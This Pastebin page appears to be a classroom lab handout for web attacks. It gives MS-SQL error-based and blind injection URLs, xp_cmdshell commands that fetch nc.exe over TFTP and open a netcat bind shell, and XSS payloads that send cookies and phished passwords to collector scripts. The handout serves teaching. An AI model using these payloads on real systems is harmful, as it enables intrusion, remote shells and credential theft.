API tools faq
paste
Advertisement
timdatasentry

Untitled

timdatasentry
Sep 7th, 2017
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.31 KB | None | 0 0
raw download clone embed print report
  1. ################
  2. # Find/Replace #
  3. ################
  4.  
  5.  
  6. tim -- Replace this with your name
  7.  
  8. 172.16.16.233 -- Replace this with the instructor ip
  9.  
  10. 172.16.16.142 -- Replace this with the webapp host ip
  11.  
  12. 56789 -- Replace with a port that is not in use by another student
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19. #########################################################################################
  20. # Basic SQL Injection Walthrough #
  21. # ------------------------------ #
  22. # A good reference for syntax is located at: #
  23. # http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet #
  24. #########################################################################################
  25.  
  26. Go to the address below in firefox:
  27.  
  28. http://172.16.16.142/book/Books.asp?STechID=2
  29.  
  30.  
  31. Notice the paramater passing:
  32.  
  33. Books.asp ? STechID = 2
  34.  
  35. The ? let's you know that the site is using parameter passing. In this case the site is passing the
  36. parameter name (STechID), and the parameter value (2) to the database.
  37.  
  38. Parameter Name = STechID
  39. Parameter Value = 2
  40.  
  41.  
  42. ###############################################
  43. # ERROR SQL INJECTION - EXTRACT DATABASE USER #
  44. ###############################################
  45.  
  46. Go to the address below in firefox:
  47. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT user)--
  48.  
  49. Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
  50.  
  51.  
  52.  
  53.  
  54.  
  55. ##################################################
  56. # ERROR SQL INJECTION - EXTRACT DATABASE VERSION #
  57. ##################################################
  58.  
  59. Go to the address below in firefox:
  60. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select @@VERSION)--
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67.  
  68. ###############################################
  69. # ERROR SQL INJECTION - EXTRACT DATABASE NAME #
  70. ###############################################
  71.  
  72. Go to the address below in firefox:
  73. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT db_name())--
  74.  
  75. Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
  76.  
  77.  
  78.  
  79.  
  80.  
  81. #############################################
  82. # ERROR SQL INJECTION - EXTRACT SERVER NAME #
  83. #############################################
  84.  
  85. Go to the address below in firefox:
  86. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (@@SERVERNAME)--
  87.  
  88. Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.
  89.  
  90.  
  91.  
  92. Another option is:
  93. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT @@servername)--
  94.  
  95.  
  96.  
  97. #########################################
  98. # ERROR SQL INJECTION - List DATABASES #
  99. #########################################
  100.  
  101. Go to the address below in firefox:
  102. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(0))--
  103. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(1))--
  104. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(2))--
  105. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(3))--
  106. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(4))--
  107. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(N))--
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114. #####################################################
  115. # ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE #
  116. #####################################################
  117.  
  118. Go to the address below in firefox:
  119. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  120.  
  121. Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
  122.  
  123.  
  124.  
  125. ####################################################
  126. # ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
  127. ####################################################
  128.  
  129. Go to the address below in firefox:
  130. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Books')--
  131.  
  132. Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.
  133.  
  134.  
  135. ####################################################
  136. # ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
  137. ####################################################
  138.  
  139. Go to the address below in firefox:
  140. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Buyers')--
  141.  
  142. Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.
  143.  
  144.  
  145.  
  146. ####################################################
  147. # ERROR SQL INJECTION - EXTRACT 4th DATABASE TABLE #
  148. ####################################################
  149.  
  150. Go to the address below in firefox:
  151. http://172.16.16.142/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Orders')--
  152.  
  153. Syntax error converting the nvarchar value '[TABLE NAME 4]' to a column of data type int.
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163. ################################
  164. # Basic MS-SQL Blind Injection #
  165. ################################
  166.  
  167. BLIND SQL INJECTION - DETECTION
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174. ###############################################
  175. # BLIND SQL INJECTION - EXTRACT DATABASE USER #
  176. ###############################################
  177. 3 - Total Characters
  178. http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  179. http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  180. http://172.16.16.142/book/Books.asp?STechID=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  181.  
  182. D - 1st Character
  183. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  184. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  185. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  186. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  187.  
  188. B - 2nd Character
  189. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  190. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  191.  
  192. O - 3rd Character
  193. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  194. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  195. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  196. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  197. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  198. http://172.16.16.142/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205.  
  206.  
  207. ##############################################
  208. # Executing System Commands With xp_cmdshell #
  209. ##############################################
  210.  
  211. Go to the address below in firefox:
  212. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
  213.  
  214.  
  215. Go to the address below in firefox:
  216. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_tim.txt'--
  217.  
  218.  
  219.  
  220. Check it
  221. --------
  222. http://172.16.16.142/book/dir_tim.txt
  223.  
  224.  
  225.  
  226.  
  227. Go to the address below in firefox:
  228. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\book\ipconfig_tim.txt'--
  229.  
  230.  
  231.  
  232. Check it
  233. --------
  234. http://172.16.16.142/book/ipconfig_tim.txt
  235.  
  236.  
  237.  
  238.  
  239. Go to the address below in firefox:
  240. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\book\netstat_tim.txt'--
  241.  
  242.  
  243.  
  244.  
  245.  
  246. Check it
  247. --------
  248. http://172.16.16.142/book/netstat_tim.txt
  249.  
  250.  
  251.  
  252.  
  253. Go to the address below in firefox:
  254. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'tftp -i 172.16.16.233GET nc.exe c:\\tim_nc.exe'--
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261. Go to the address below in firefox:
  262. http://172.16.16.142/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'c:\\tim_nc.exe -l -p 56789 -e cmd.exe'--
  263.  
  264.  
  265.  
  266. Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
  267.  
  268.  
  269.  
  270.  
  271. Open a duplicate session in Putty and type the following:
  272. ---------------------------------------------------------
  273. nc 172.16.16.142 56789
  274.  
  275.  
  276.  
  277. Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288.  
  289. #################################
  290. # Really basic XSS walk-through #
  291. #################################
  292.  
  293.  
  294.  
  295. 1. Use Firefox to browse to the following location:
  296.  
  297. http://199.204.214.176/xss_practice/
  298.  
  299. A really simple search page that is vulnerable should come up.
  300.  
  301.  
  302.  
  303.  
  304. 2. In the search box type:
  305.  
  306. <script>alert('So this is XSS')</script>
  307.  
  308.  
  309. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  310.  
  311.  
  312. 3. In the search box type:
  313.  
  314. <script>alert(document.cookie)</script>
  315.  
  316.  
  317. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  318.  
  319.  
  320.  
  321. 4. Now replace that alert script with:
  322.  
  323. <script>document.location="http://199.204.214.176/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  324.  
  325.  
  326. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  327.  
  328.  
  329. 5. Now view the stolen cookie at:
  330. http://199.204.214.176/xss_practice/cookie_stealer_logs.html
  331.  
  332.  
  333. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  334.  
  335.  
  336.  
  337.  
  338.  
  339.  
  340. ############################
  341. # A Better Way To Demo XSS #
  342. ############################
  343.  
  344.  
  345. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  346.  
  347.  
  348. Use Firefox to browse to the following location:
  349.  
  350. http://199.204.214.176/xss_practice/
  351.  
  352.  
  353.  
  354. Paste this in the search box
  355. ----------------------------
  356.  
  357.  
  358. Option 1
  359. --------
  360.  
  361. <script>
  362. password=prompt('Your session is expired. Please enter your password to continue',' ');
  363. document.write("<img src=\"http://199.204.214.176/xss_practice/passwordgrabber.php?password=" +password+"\">");
  364. </script>
  365.  
  366.  
  367. Now view the stolen cookie at:
  368. http://199.204.214.176/xss_practice/passwords.html
  369.  
  370.  
  371.  
  372. Option 2
  373. --------
  374. <script>
  375. username=prompt('Please enter your username',' ');
  376. password=prompt('Please enter your password',' ');
  377. document.write("<img src=\"http://199.204.214.176/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  378. </script>
  379.  
  380.  
  381.  
  382.  
  383. Now view the stolen cookie at:
  384. http://199.204.214.176/xss_practice/username_password_logs.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!